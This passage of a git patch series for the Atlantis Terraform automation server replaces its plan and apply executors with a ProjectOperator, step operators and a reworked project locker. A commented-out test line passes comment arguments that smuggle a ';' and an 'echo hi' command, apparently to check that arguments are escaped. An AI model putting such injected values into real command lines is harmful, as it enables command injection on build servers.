+// The raw.Spec is transformed into the ValidSpec which is then used by the +// rest of Atlantis. +type Spec struct { + // Version is the version of the atlantis YAML file. Will always be equal + // to 2. + Version int + Projects []Project + Workflows map[string]Workflow +} + +type Project struct { + Dir string + Workspace string + Workflow *string + TerraformVersion *string + Autoplan Autoplan + ApplyRequirements []string +} + +type Autoplan struct { + WhenModified []string + Enabled bool +} + +type Stage struct { + Steps []Step +} + +type Step struct { + StepName string + ExtraArgs []string + RunCommand []string +} + +type Workflow struct { + Apply *Stage + Plan *Stage +} diff --git a/server/events/yaml/workflow.go b/server/events/yaml/workflow.go deleted file mode 100644 index 0dd069c648..0000000000 --- a/server/events/yaml/workflow.go +++ /dev/null @@ -1,6 +0,0 @@ -package yaml - -type Workflow struct { - Apply *Stage `yaml:"apply,omitempty"` - Plan *Stage `yaml:"plan,omitempty"` -} diff --git a/server/events/yaml/workflow_test.go b/server/events/yaml/workflow_test.go deleted file mode 100644 index c2dcbb34f8..0000000000 --- a/server/events/yaml/workflow_test.go +++ /dev/null @@ -1,91 +0,0 @@ -package yaml_test - -import ( - "testing" - - "github.com/runatlantis/atlantis/server/events/yaml" - . 
"github.com/runatlantis/atlantis/testing" - yamlv2 "gopkg.in/yaml.v2" -) - -func TestWorkflow_UnmarshalYAML(t *testing.T) { - cases := []struct { - description string - input string - exp yaml.Workflow - expErr string - }{ - { - description: "empty", - input: ``, - exp: yaml.Workflow{ - Apply: nil, - Plan: nil, - }, - }, - { - description: "yaml null", - input: `~`, - exp: yaml.Workflow{ - Apply: nil, - Plan: nil, - }, - }, - { - description: "only plan/apply set", - input: ` -plan: -apply: -`, - exp: yaml.Workflow{ - Apply: nil, - Plan: nil, - }, - }, - { - description: "steps set to null", - input: ` -plan: - steps: ~ -apply: - steps: ~`, - exp: yaml.Workflow{ - Plan: &yaml.Stage{ - Steps: nil, - }, - Apply: &yaml.Stage{ - Steps: nil, - }, - }, - }, - { - description: "steps set to empty slice", - input: ` -plan: - steps: [] -apply: - steps: []`, - exp: yaml.Workflow{ - Plan: &yaml.Stage{ - Steps: []yaml.Step{}, - }, - Apply: &yaml.Stage{ - Steps: []yaml.Step{}, - }, - }, - }, - } - - for _, c := range cases { - t.Run(c.description, func(t *testing.T) { - var w yaml.Workflow - err := yamlv2.UnmarshalStrict([]byte(c.input), &w) - if c.expErr != "" { - ErrEquals(t, c.expErr, err) - return - } - Ok(t, err) - Equals(t, c.exp, w) - }) - } -} diff --git a/server/events/yaml/yaml.go b/server/events/yaml/yaml.go deleted file mode 100644 index 08b884cae0..0000000000 --- a/server/events/yaml/yaml.go +++ /dev/null @@ -1,4 +0,0 @@ -// Package yaml contains the golang representations of the YAML elements -// supported in atlantis.yaml. Many of the elements implement UnmarshalYAML -// in order to set defaults. -package yaml From b5e2a730de932a6da07cdfd09c72900f96927fa3 Mon Sep 17 00:00:00 2001 From: Luke Kysow Date: Fri, 15 Jun 2018 14:01:09 +0100 Subject: [PATCH 21/69] WIP Add operators and get compiled. 
--- server/events/apply_executor.go | 92 -------- server/events/command_handler.go | 13 +- server/events/event_parser.go | 2 +- server/events/execution_planner.go | 215 ------------------ server/events/models/models.go | 24 ++ server/events/plan_executor.go | 109 --------- server/events/project_locker.go | 19 +- server/events/project_operator.go | 190 ++++++++++++++++ ...cutor_test.go => project_operator_test.go} | 2 +- server/events/pull_request_operator.go | 193 ++++++++++++++++ ..._test.go => pull_request_operator_test.go} | 4 +- server/events/runtime/apply_step.go | 24 -- server/events/runtime/apply_step_operator.go | 30 +++ ...ep_test.go => apply_step_operator_test.go} | 0 server/events/runtime/approval_operator.go | 18 ++ server/events/runtime/init_step.go | 20 -- server/events/runtime/init_step_operator.go | 29 +++ ...tep_test.go => init_step_operator_test.go} | 22 +- .../{plan_step.go => plan_step_operater.go} | 52 +++-- ...tep_test.go => plan_step_operater_test.go} | 0 server/events/runtime/repoconfig.go | 93 -------- server/events/runtime/run_step.go | 35 --- server/events/runtime/run_step_operator.go | 33 +++ ...step_test.go => run_step_operator_test.go} | 0 server/events/runtime/runtime.go | 18 ++ server/events/terraform/terraform_client.go | 13 +- server/events/yaml/raw/project.go | 13 +- server/events/yaml/valid/valid.go | 31 ++- server/server.go | 68 +++--- 29 files changed, 673 insertions(+), 689 deletions(-) delete mode 100644 server/events/apply_executor.go delete mode 100644 server/events/execution_planner.go delete mode 100644 server/events/plan_executor.go create mode 100644 server/events/project_operator.go rename server/events/{plan_executor_test.go => project_operator_test.go} (99%) create mode 100644 server/events/pull_request_operator.go rename server/events/{execution_planner_test.go => pull_request_operator_test.go} (98%) delete mode 100644 server/events/runtime/apply_step.go create mode 100644 
server/events/runtime/apply_step_operator.go rename server/events/runtime/{apply_step_test.go => apply_step_operator_test.go} (100%) create mode 100644 server/events/runtime/approval_operator.go delete mode 100644 server/events/runtime/init_step.go create mode 100644 server/events/runtime/init_step_operator.go rename server/events/runtime/{init_step_test.go => init_step_operator_test.go} (75%) rename server/events/runtime/{plan_step.go => plan_step_operater.go} (54%) rename server/events/runtime/{plan_step_test.go => plan_step_operater_test.go} (100%) delete mode 100644 server/events/runtime/repoconfig.go delete mode 100644 server/events/runtime/run_step.go create mode 100644 server/events/runtime/run_step_operator.go rename server/events/runtime/{run_step_test.go => run_step_operator_test.go} (100%) diff --git a/server/events/apply_executor.go b/server/events/apply_executor.go deleted file mode 100644 index 260a7fffa0..0000000000 --- a/server/events/apply_executor.go +++ /dev/null @@ -1,92 +0,0 @@ -// Copyright 2017 HootSuite Media Inc. -// -// Licensed under the Apache License, Version 2.0 (the License); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// http://www.apache.org/licenses/LICENSE-2.0 -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an AS IS BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. -// Modified hereafter by contributors to runatlantis/atlantis. 
-// -package events - -import ( - "github.com/runatlantis/atlantis/server/events/models" - "github.com/runatlantis/atlantis/server/events/run" - "github.com/runatlantis/atlantis/server/events/terraform" - "github.com/runatlantis/atlantis/server/events/vcs" - "github.com/runatlantis/atlantis/server/events/webhooks" -) - -// ApplyExecutor handles executing terraform apply. -type ApplyExecutor struct { - VCSClient vcs.ClientProxy - Terraform *terraform.DefaultClient - RequireApproval bool - Run *run.Run - AtlantisWorkspace AtlantisWorkspace - ProjectLocker *DefaultProjectLocker - Webhooks webhooks.Sender - ExecutionPlanner *ExecutionPlanner -} - -// Execute executes apply for the ctx. -func (a *ApplyExecutor) Execute(ctx *CommandContext) CommandResponse { - //if a.RequireApproval { - // approved, err := a.VCSClient.PullIsApproved(ctx.BaseRepo, ctx.Pull) - // if err != nil { - // return CommandResponse{Error: errors.Wrap(err, "checking if pull request was approved")} - // } - // if !approved { - // return CommandResponse{Failure: "Pull request must be approved before running apply."} - // } - // ctx.Log.Info("confirmed pull request was approved") - //} - - repoDir, err := a.AtlantisWorkspace.GetWorkspace(ctx.BaseRepo, ctx.Pull, ctx.Command.Workspace) - if err != nil { - return CommandResponse{Failure: "No workspace found. 
Did you run plan?"} - } - ctx.Log.Info("found workspace in %q", repoDir) - - stage, err := a.ExecutionPlanner.BuildApplyStage(ctx.Log, repoDir, ctx.Command.Workspace, ctx.Command.Dir, ctx.Command.Flags, ctx.User.Username) - if err != nil { - return CommandResponse{Error: err} - } - - // check if we have the lock - tryLockResponse, err := a.ProjectLocker.TryLock(ctx, models.NewProject(ctx.BaseRepo.FullName, ctx.Command.Dir)) - if err != nil { - return CommandResponse{ProjectResults: []ProjectResult{{Error: err}}} - } - if !tryLockResponse.LockAcquired { - return CommandResponse{ProjectResults: []ProjectResult{{Failure: tryLockResponse.LockFailureReason}}} - } - - // Check apply requirements. - for _, req := range stage.ApplyRequirements { - isMet, reason := req.IsMet() - if !isMet { - return CommandResponse{Failure: reason} - } - } - - out, err := stage.Run() - - // Send webhooks even if there's an error. - a.Webhooks.Send(ctx.Log, webhooks.ApplyResult{ // nolint: errcheck - Workspace: ctx.Command.Workspace, - User: ctx.User, - Repo: ctx.BaseRepo, - Pull: ctx.Pull, - Success: err == nil, - }) - - if err != nil { - return CommandResponse{Error: err} - } - return CommandResponse{ProjectResults: []ProjectResult{{ApplySuccess: out}}} -} diff --git a/server/events/command_handler.go b/server/events/command_handler.go index 54c0ffa47f..e327c13ee3 100644 --- a/server/events/command_handler.go +++ b/server/events/command_handler.go @@ -53,8 +53,6 @@ type GitlabMergeRequestGetter interface { // CommandHandler is the first step when processing a comment command. type CommandHandler struct { - PlanExecutor Executor - ApplyExecutor Executor VCSClient vcs.ClientProxy GithubPullGetter GithubPullGetter GitlabMergeRequestGetter GitlabMergeRequestGetter @@ -68,7 +66,8 @@ type CommandHandler struct { // AllowForkPRsFlag is the name of the flag that controls fork PR's. We use // this in our error message back to the user on a forked PR so they know // how to enable this functionality. 
- AllowForkPRsFlag string + AllowForkPRsFlag string + PullRequestOperator PullRequestOperator } // ExecuteCommand executes the command. @@ -169,9 +168,13 @@ func (c *CommandHandler) run(ctx *CommandContext) { var cr CommandResponse switch ctx.Command.Name { case Plan: - cr = c.PlanExecutor.Execute(ctx) + if ctx.Command.Autoplan { + cr = c.PullRequestOperator.Autoplan(ctx) + } else { + cr = c.PullRequestOperator.PlanViaComment(ctx) + } case Apply: - cr = c.ApplyExecutor.Execute(ctx) + cr = c.PullRequestOperator.ApplyViaComment(ctx) default: ctx.Log.Err("failed to determine desired command, neither plan nor apply") } diff --git a/server/events/event_parser.go b/server/events/event_parser.go index 742a765a99..bfe08a6c68 100644 --- a/server/events/event_parser.go +++ b/server/events/event_parser.go @@ -36,7 +36,7 @@ type Command struct { // Dir is the path relative to the repo root to run the command in. // Will never be an empty string and will never end in "/". Dir string - // Flags are the extra arguments appended to comment, + // CommentArgs are the extra arguments appended to comment, // ex. 
atlantis plan -- -target=resource Flags []string Name CommandName diff --git a/server/events/execution_planner.go b/server/events/execution_planner.go deleted file mode 100644 index 4b13ce2190..0000000000 --- a/server/events/execution_planner.go +++ /dev/null @@ -1,215 +0,0 @@ -package events - -import ( - "fmt" - "os" - "path/filepath" - - "github.com/hashicorp/go-version" - "github.com/runatlantis/atlantis/server/events/models" - "github.com/runatlantis/atlantis/server/events/runtime" - "github.com/runatlantis/atlantis/server/events/yaml" - "github.com/runatlantis/atlantis/server/events/yaml/valid" - "github.com/runatlantis/atlantis/server/logging" -) - -const PlanStageName = "plan" -const ApplyStageName = "apply" -const AtlantisYAMLFilename = "atlantis.yaml" - -type ExecutionPlanner struct { - TerraformExecutor TerraformExec - DefaultTFVersion *version.Version - ParserValidator *yaml.ParserValidator - ProjectFinder ProjectFinder -} - -type TerraformExec interface { - RunCommandWithVersion(log *logging.SimpleLogger, path string, args []string, v *version.Version, workspace string) (string, error) -} - -func (s *ExecutionPlanner) BuildPlanStage(log *logging.SimpleLogger, repoDir string, workspace string, relProjectPath string, extraCommentArgs []string, username string) (runtime.PlanStage, error) { - defaults := s.defaultPlanSteps(log, repoDir, workspace, relProjectPath, extraCommentArgs, username) - steps, err := s.buildStage(PlanStageName, log, repoDir, workspace, relProjectPath, extraCommentArgs, username, defaults) - if err != nil { - return runtime.PlanStage{}, err - } - return runtime.PlanStage{ - Steps: steps, - Workspace: workspace, - ProjectPath: relProjectPath, - }, nil -} - -func (s *ExecutionPlanner) BuildAutoplanStages(log *logging.SimpleLogger, repoFullName string, repoDir string, username string, modifiedFiles []string) ([]runtime.PlanStage, error) { - // If there is an atlantis.yaml - // -> Get modified files from pull request. 
- // -> For each project, if autoplan == true && files match - // ->-> Build plan stage for that project. - // Else - // -> Get modified files - // -> For each modified project use default plan stage. - config, err := s.ParserValidator.ReadConfig(repoDir) - if err != nil && !os.IsNotExist(err) { - return nil, err - } - - // If there is no config file, then we try to plan for each project that - // was modified in the pull request. - if os.IsNotExist(err) { - projects := s.ProjectFinder.DetermineProjects(log, modifiedFiles, repoFullName, repoDir) - var stages []runtime.PlanStage - for _, p := range projects { - // NOTE: we use the default workspace because we don't know about - // other workspaces. If users want to plan for other workspaces they - // need to use a config file. - steps := s.defaultPlanSteps(log, repoDir, models.DefaultWorkspace, p.Path, nil, username) - stages = append(stages, runtime.PlanStage{ - Steps: steps, - Workspace: models.DefaultWorkspace, - ProjectPath: p.Path, - }) - } - return stages, nil - } - - // Else we run plan according to the config file. 
- var stages []runtime.PlanStage - for _, p := range config.Projects { - if s.shouldAutoplan(p.Autoplan, modifiedFiles) { - // todo - stages = append(stages) - } - } - return stages, nil -} - -func (s *ExecutionPlanner) shouldAutoplan(autoplan valid.Autoplan, modifiedFiles []string) bool { - return true -} - -func (s *ExecutionPlanner) getSteps() { - -} - -func (s *ExecutionPlanner) BuildApplyStage(log *logging.SimpleLogger, repoDir string, workspace string, relProjectPath string, extraCommentArgs []string, username string) (*runtime.ApplyStage, error) { - defaults := s.defaultApplySteps(log, repoDir, workspace, relProjectPath, extraCommentArgs, username) - steps, err := s.buildStage(ApplyStageName, log, repoDir, workspace, relProjectPath, extraCommentArgs, username, defaults) - if err != nil { - return nil, err - } - return &runtime.ApplyStage{ - Steps: steps, - }, nil -} - -func (s *ExecutionPlanner) buildStage(stageName string, log *logging.SimpleLogger, repoDir string, workspace string, relProjectPath string, extraCommentArgs []string, username string, defaults []runtime.Step) ([]runtime.Step, error) { - config, err := s.ParserValidator.ReadConfig(repoDir) - - // If there's no config file, use defaults. - if os.IsNotExist(err) { - log.Info("no %s file found––continuing with defaults", AtlantisYAMLFilename) - return defaults, nil - } - - if err != nil { - return nil, err - } - - // Get this project's configuration. - for _, p := range config.Projects { - if p.Dir == relProjectPath && p.Workspace == workspace { - workflowNamePtr := p.Workflow - - // If they didn't specify a workflow, use the default. - if workflowNamePtr == nil { - log.Info("no %s workflow set––continuing with defaults", AtlantisYAMLFilename) - return defaults, nil - } - - // If they did specify a workflow, find it. 
- workflowName := *workflowNamePtr - workflow, exists := config.Workflows[workflowName] - if !exists { - return nil, fmt.Errorf("no workflow with key %q defined", workflowName) - } - - // We have a workflow defined, so now we need to build it. - meta := s.buildMeta(log, repoDir, workspace, relProjectPath, extraCommentArgs, username) - var steps []runtime.Step - var stepsConfig []valid.Step - if stageName == PlanStageName { - stepsConfig = workflow.Plan.Steps - } else { - stepsConfig = workflow.Apply.Steps - } - for _, stepConfig := range stepsConfig { - var step runtime.Step - switch stepConfig.StepName { - case "init": - step = &runtime.InitStep{ - Meta: meta, - ExtraArgs: stepConfig.ExtraArgs, - } - case "plan": - step = &runtime.PlanStep{ - Meta: meta, - ExtraArgs: stepConfig.ExtraArgs, - } - case "apply": - step = &runtime.ApplyStep{ - Meta: meta, - ExtraArgs: stepConfig.ExtraArgs, - } - case "run": - step = &runtime.RunStep{ - Meta: meta, - Commands: stepConfig.RunCommand, - } - } - steps = append(steps, step) - } - return steps, nil - } - } - // They haven't defined this project, use the default workflow. - log.Info("no project with dir %q and workspace %q defined; continuing with defaults", relProjectPath, workspace) - return defaults, nil -} - -func (s *ExecutionPlanner) buildMeta(log *logging.SimpleLogger, repoDir string, workspace string, relProjectPath string, extraCommentArgs []string, username string) runtime.StepMeta { - return runtime.StepMeta{ - Log: log, - Workspace: workspace, - AbsolutePath: filepath.Join(repoDir, relProjectPath), - DirRelativeToRepoRoot: relProjectPath, - // If there's no config then we should use the default tf version. 
- TerraformVersion: s.DefaultTFVersion, - TerraformExecutor: s.TerraformExecutor, - ExtraCommentArgs: extraCommentArgs, - Username: username, - } -} - -func (s *ExecutionPlanner) defaultPlanSteps(log *logging.SimpleLogger, repoDir string, workspace string, relProjectPath string, extraCommentArgs []string, username string) []runtime.Step { - meta := s.buildMeta(log, repoDir, workspace, relProjectPath, extraCommentArgs, username) - return []runtime.Step{ - &runtime.InitStep{ - ExtraArgs: nil, - Meta: meta, - }, - &runtime.PlanStep{ - ExtraArgs: nil, - Meta: meta, - }, - } -} -func (s *ExecutionPlanner) defaultApplySteps(log *logging.SimpleLogger, repoDir string, workspace string, relProjectPath string, extraCommentArgs []string, username string) []runtime.Step { - meta := s.buildMeta(log, repoDir, workspace, relProjectPath, extraCommentArgs, username) - return []runtime.Step{ - &runtime.ApplyStep{ - ExtraArgs: nil, - Meta: meta, - }, - } -} diff --git a/server/events/models/models.go b/server/events/models/models.go index 1d8d72453f..30faf4ea23 100644 --- a/server/events/models/models.go +++ b/server/events/models/models.go @@ -24,6 +24,8 @@ import ( "time" "github.com/pkg/errors" + "github.com/runatlantis/atlantis/server/events/yaml/valid" + "github.com/runatlantis/atlantis/server/logging" ) // DefaultWorkspace is the default Terraform workspace for both Atlantis and @@ -210,3 +212,25 @@ func (h VCSHostType) String() string { } return "" } + +type ProjectCommandContext struct { + // BaseRepo is the repository that the pull request will be merged into. + BaseRepo Repo + // HeadRepo is the repository that is getting merged into the BaseRepo. + // If the pull request branch is from the same repository then HeadRepo will + // be the same as BaseRepo. + // See https://help.github.com/articles/about-pull-request-merges/. + HeadRepo Repo + Pull PullRequest + // User is the user that triggered this command. 
+ User User + Log *logging.SimpleLogger + RepoRelPath string + ProjectConfig *valid.Project + GlobalConfig *valid.Spec + + // CommentArgs are the extra arguments appended to comment, + // ex. atlantis plan -- -target=resource + CommentArgs []string + Workspace string +} diff --git a/server/events/plan_executor.go b/server/events/plan_executor.go deleted file mode 100644 index 4dd221422f..0000000000 --- a/server/events/plan_executor.go +++ /dev/null @@ -1,109 +0,0 @@ -// Copyright 2017 HootSuite Media Inc. -// -// Licensed under the Apache License, Version 2.0 (the License); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// http://www.apache.org/licenses/LICENSE-2.0 -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an AS IS BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. -// Modified hereafter by contributors to runatlantis/atlantis. -// -package events - -import ( - "fmt" - - "github.com/pkg/errors" - "github.com/runatlantis/atlantis/server/events/locking" - "github.com/runatlantis/atlantis/server/events/run" - "github.com/runatlantis/atlantis/server/events/runtime" - "github.com/runatlantis/atlantis/server/events/terraform" - "github.com/runatlantis/atlantis/server/events/vcs" -) - -//go:generate pegomock generate -m --use-experimental-model-gen --package mocks -o mocks/mock_lock_url_generator.go LockURLGenerator - -type LockURLGenerator interface { - GenerateLockURL(lockID string) string -} - -// PlanExecutor handles everything related to running terraform plan. 
-type PlanExecutor struct { - VCSClient vcs.ClientProxy - Terraform terraform.Client - Locker locking.Locker - Run run.Runner - Workspace AtlantisWorkspace - ProjectFinder ProjectFinder - ProjectLocker ProjectLocker - ExecutionPlanner *ExecutionPlanner - LockURLGenerator LockURLGenerator -} - -// PlanSuccess is the result of a successful plan. -type PlanSuccess struct { - TerraformOutput string - LockURL string -} - -// Execute executes terraform plan for the ctx. -func (p *PlanExecutor) Execute(ctx *CommandContext) CommandResponse { - cloneDir, err := p.Workspace.Clone(ctx.Log, ctx.BaseRepo, ctx.HeadRepo, ctx.Pull, ctx.Command.Workspace) - if err != nil { - return CommandResponse{Error: err} - } - - var stages []runtime.PlanStage - if ctx.Command.Autoplan { - modifiedFiles, err := p.VCSClient.GetModifiedFiles(ctx.BaseRepo, ctx.Pull) - if err != nil { - return CommandResponse{Error: errors.Wrap(err, "getting modified files")} - } - stages, err = p.ExecutionPlanner.BuildAutoplanStages(ctx.Log, ctx.BaseRepo.FullName, cloneDir, ctx.User.Username, modifiedFiles) - if err != nil { - return CommandResponse{Error: err} - } - } else { - stage, err := p.ExecutionPlanner.BuildPlanStage(ctx.Log, cloneDir, ctx.Command.Workspace, ctx.Command.Dir, ctx.Command.Flags, ctx.User.Username) - if err != nil { - return CommandResponse{Error: err} - } - stages = append(stages, stage) - } - - var projectResults []ProjectResult - for _, stage := range stages { - projectResult := ProjectResult{ - Path: stage.ProjectPath, - Workspace: stage.Workspace, - } - - // todo: this should be moved into the plan stage - //tryLockResponse, err := p.ProjectLocker.TryLock(ctx, models.NewProject(ctx.BaseRepo.FullName, ctx.Command.Dir)) - //if err != nil { - // return CommandResponse{ProjectResults: []ProjectResult{{Error: err}}} - //} - //if !tryLockResponse.LockAcquired { - // return CommandResponse{ProjectResults: []ProjectResult{{Failure: tryLockResponse.LockFailureReason}}} - //} - // todo: endtodo - 
- out, err := stage.Run() - if err != nil { - //if unlockErr := tryLockResponse.UnlockFn(); unlockErr != nil { - // ctx.Log.Err("error unlocking state after plan error: %s", unlockErr) - //} - projectResult.Error = fmt.Errorf("%s\n%s", err.Error(), out) - } else { - projectResult.PlanSuccess = &PlanSuccess{ - TerraformOutput: out, - //LockURL: p.LockURLGenerator.GenerateLockURL(tryLockResponse.LockKey), - } - } - projectResults = append(projectResults, projectResult) - } - return CommandResponse{ProjectResults: projectResults} -} diff --git a/server/events/project_locker.go b/server/events/project_locker.go index 9b7060585b..e6983d5c06 100644 --- a/server/events/project_locker.go +++ b/server/events/project_locker.go @@ -18,8 +18,7 @@ import ( "github.com/runatlantis/atlantis/server/events/locking" "github.com/runatlantis/atlantis/server/events/models" - "github.com/runatlantis/atlantis/server/events/run" - "github.com/runatlantis/atlantis/server/events/terraform" + "github.com/runatlantis/atlantis/server/logging" ) //go:generate pegomock generate -m --use-experimental-model-gen --package mocks -o mocks/mock_project_lock.go ProjectLocker @@ -33,15 +32,12 @@ type ProjectLocker interface { // The third return value is a function that can be called to unlock the // lock. It will only be set if the lock was acquired. Any errors will set // error. - TryLock(ctx *CommandContext, project models.Project) (*TryLockResponse, error) + TryLock(log *logging.SimpleLogger, pull models.PullRequest, user models.User, workspace string, project models.Project) (*TryLockResponse, error) } // DefaultProjectLocker implements ProjectLocker. type DefaultProjectLocker struct { - Locker locking.Locker - ConfigReader ProjectConfigReader - Terraform terraform.Client - Run run.Runner + Locker locking.Locker } // TryLockResponse is the result of trying to lock a project. @@ -60,13 +56,12 @@ type TryLockResponse struct { } // TryLock implements ProjectLocker.TryLock. 
-func (p *DefaultProjectLocker) TryLock(ctx *CommandContext, project models.Project) (*TryLockResponse, error) { - workspace := ctx.Command.Workspace - lockAttempt, err := p.Locker.TryLock(project, workspace, ctx.Pull, ctx.User) +func (p *DefaultProjectLocker) TryLock(log *logging.SimpleLogger, pull models.PullRequest, user models.User, workspace string, project models.Project) (*TryLockResponse, error) { + lockAttempt, err := p.Locker.TryLock(project, workspace, pull, user) if err != nil { return nil, err } - if !lockAttempt.LockAcquired && lockAttempt.CurrLock.Pull.Num != ctx.Pull.Num { + if !lockAttempt.LockAcquired && lockAttempt.CurrLock.Pull.Num != pull.Num { failureMsg := fmt.Sprintf( "This project is currently locked by #%d. The locking plan must be applied or discarded before future plans can execute.", lockAttempt.CurrLock.Pull.Num) @@ -75,7 +70,7 @@ func (p *DefaultProjectLocker) TryLock(ctx *CommandContext, project models.Proje LockFailureReason: failureMsg, }, nil } - ctx.Log.Info("acquired lock with id %q", lockAttempt.LockKey) + log.Info("acquired lock with id %q", lockAttempt.LockKey) return &TryLockResponse{ LockAcquired: true, UnlockFn: func() error { diff --git a/server/events/project_operator.go b/server/events/project_operator.go new file mode 100644 index 0000000000..37dfcb5f01 --- /dev/null +++ b/server/events/project_operator.go @@ -0,0 +1,190 @@ +// Copyright 2017 HootSuite Media Inc. +// +// Licensed under the Apache License, Version 2.0 (the License); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// http://www.apache.org/licenses/LICENSE-2.0 +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an AS IS BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. 
+// Modified hereafter by contributors to runatlantis/atlantis. +// +package events + +import ( + "path/filepath" + "strings" + + "github.com/pkg/errors" + "github.com/runatlantis/atlantis/server/events/models" + "github.com/runatlantis/atlantis/server/events/runtime" + "github.com/runatlantis/atlantis/server/events/webhooks" + "github.com/runatlantis/atlantis/server/events/yaml/valid" +) + +//go:generate pegomock generate -m --use-experimental-model-gen --package mocks -o mocks/mock_lock_url_generator.go LockURLGenerator + +type LockURLGenerator interface { + GenerateLockURL(lockID string) string +} + +// PlanSuccess is the result of a successful plan. +type PlanSuccess struct { + TerraformOutput string + LockURL string +} + +type ProjectOperator struct { + Locker ProjectLocker + LockURLGenerator LockURLGenerator + InitStepOperator runtime.InitStepOperator + PlanStepOperator runtime.PlanStepOperator + ApplyStepOperator runtime.ApplyStepOperator + RunStepOperator runtime.RunStepOperator + ApprovalOperator runtime.ApprovalOperator + Workspace AtlantisWorkspace + Webhooks *webhooks.MultiWebhookSender +} + +func (p *ProjectOperator) Plan(ctx models.ProjectCommandContext, projAbsPathPtr *string) ProjectResult { + // Acquire Atlantis lock for this repo/dir/workspace. + lockAttempt, err := p.Locker.TryLock(ctx.Log, ctx.Pull, ctx.User, ctx.Workspace, models.NewProject(ctx.BaseRepo.FullName, ctx.RepoRelPath)) + if err != nil { + return ProjectResult{Error: errors.Wrap(err, "acquiring lock")} + } + if !lockAttempt.LockAcquired { + return ProjectResult{Failure: lockAttempt.LockFailureReason} + } + + // Ensure project has been cloned. 
+ var projAbsPath string + if projAbsPathPtr == nil { + repoDir, err := p.Workspace.Clone(ctx.Log, ctx.BaseRepo, ctx.HeadRepo, ctx.Pull, ctx.Workspace) + if err != nil { + if unlockErr := lockAttempt.UnlockFn(); unlockErr != nil { + ctx.Log.Err("error unlocking state after plan error: %v", unlockErr) + } + return ProjectResult{Error: err} + } + projAbsPath = filepath.Join(repoDir, ctx.RepoRelPath) + } else { + projAbsPath = *projAbsPathPtr + } + + // Use default stage unless another workflow is defined in config + stage := p.defaultPlanStage() + if ctx.ProjectConfig != nil && ctx.ProjectConfig.Workflow != nil { + configuredStage := ctx.GlobalConfig.GetPlanStage(*ctx.ProjectConfig.Workflow) + if configuredStage != nil { + stage = *configuredStage + } + } + outputs, err := p.runSteps(stage.Steps, ctx, projAbsPath) + if err != nil { + if unlockErr := lockAttempt.UnlockFn(); unlockErr != nil { + ctx.Log.Err("error unlocking state after plan error: %v", unlockErr) + } + // todo: include output from other steps. + return ProjectResult{Error: err} + } + + return ProjectResult{ + PlanSuccess: &PlanSuccess{ + LockURL: p.LockURLGenerator.GenerateLockURL(lockAttempt.LockKey), + TerraformOutput: strings.Join(outputs, "\n"), + }, + } +} + +func (p *ProjectOperator) runSteps(steps []valid.Step, ctx models.ProjectCommandContext, absPath string) ([]string, error) { + var outputs []string + for _, step := range steps { + var out string + var err error + switch step.StepName { + case "init": + out, err = p.InitStepOperator.Run(ctx, step.ExtraArgs, absPath) + case "plan": + out, err = p.PlanStepOperator.Run(ctx, step.ExtraArgs, absPath) + case "apply": + out, err = p.ApplyStepOperator.Run(ctx, step.ExtraArgs, absPath) + case "run": + out, err = p.RunStepOperator.Run(ctx, step.RunCommand, absPath) + } + + if err != nil { + // todo: include output from other steps. 
+ return nil, err + } + if out != "" { + outputs = append(outputs, out) + } + } + return outputs, nil +} + +func (p *ProjectOperator) Apply(ctx models.ProjectCommandContext, absPath string) ProjectResult { + if ctx.ProjectConfig != nil { + for _, req := range ctx.ProjectConfig.ApplyRequirements { + switch req { + case "approved": + approved, err := p.ApprovalOperator.IsApproved(ctx.BaseRepo, ctx.Pull) + if err != nil { + return ProjectResult{Error: errors.Wrap(err, "checking if pull request was approved")} + } + if !approved { + return ProjectResult{Failure: "Pull request must be approved before running apply."} + } + } + } + } + + // Use default stage unless another workflow is defined in config + stage := p.defaultApplyStage() + if ctx.ProjectConfig != nil && ctx.ProjectConfig.Workflow != nil { + configuredStage := ctx.GlobalConfig.GetApplyStage(*ctx.ProjectConfig.Workflow) + if configuredStage != nil { + stage = *configuredStage + } + } + outputs, err := p.runSteps(stage.Steps, ctx, absPath) + p.Webhooks.Send(ctx.Log, webhooks.ApplyResult{ // nolint: errcheck + Workspace: ctx.Workspace, + User: ctx.User, + Repo: ctx.BaseRepo, + Pull: ctx.Pull, + Success: err == nil, + }) + if err != nil { + // todo: include output from other steps. 
+ return ProjectResult{Error: err} + } + return ProjectResult{ + ApplySuccess: strings.Join(outputs, "\n"), + } +} + +func (p ProjectOperator) defaultPlanStage() valid.Stage { + return valid.Stage{ + Steps: []valid.Step{ + { + StepName: "init", + }, + { + StepName: "plan", + }, + }, + } +} + +func (p ProjectOperator) defaultApplyStage() valid.Stage { + return valid.Stage{ + Steps: []valid.Step{ + { + StepName: "apply", + }, + }, + } +} diff --git a/server/events/plan_executor_test.go b/server/events/project_operator_test.go similarity index 99% rename from server/events/plan_executor_test.go rename to server/events/project_operator_test.go index 371aa9ec5c..2659c2d50c 100644 --- a/server/events/plan_executor_test.go +++ b/server/events/project_operator_test.go @@ -116,7 +116,7 @@ package events_test // p, runner, _ := setupPlanExecutorTest(t) // ctx := deepcopy.Copy(planCtx).(events.CommandContext) // ctx.Log = logging.NewNoopLogger() -// ctx.Command.Flags = []string{"\"-target=resource\"", "\"-var\"", "\"a=b\"", "\";\"", "\"echo\"", "\"hi\""} +// ctx.Command.CommentArgs = []string{"\"-target=resource\"", "\"-var\"", "\"a=b\"", "\";\"", "\"echo\"", "\"hi\""} // // When(p.VCSClient.GetModifiedFiles(matchers.AnyModelsRepo(), matchers.AnyModelsPullRequest())).ThenReturn([]string{"file.tf"}, nil) // When(p.Workspace.Clone(ctx.Log, ctx.BaseRepo, ctx.HeadRepo, ctx.Pull, "workspace")). 
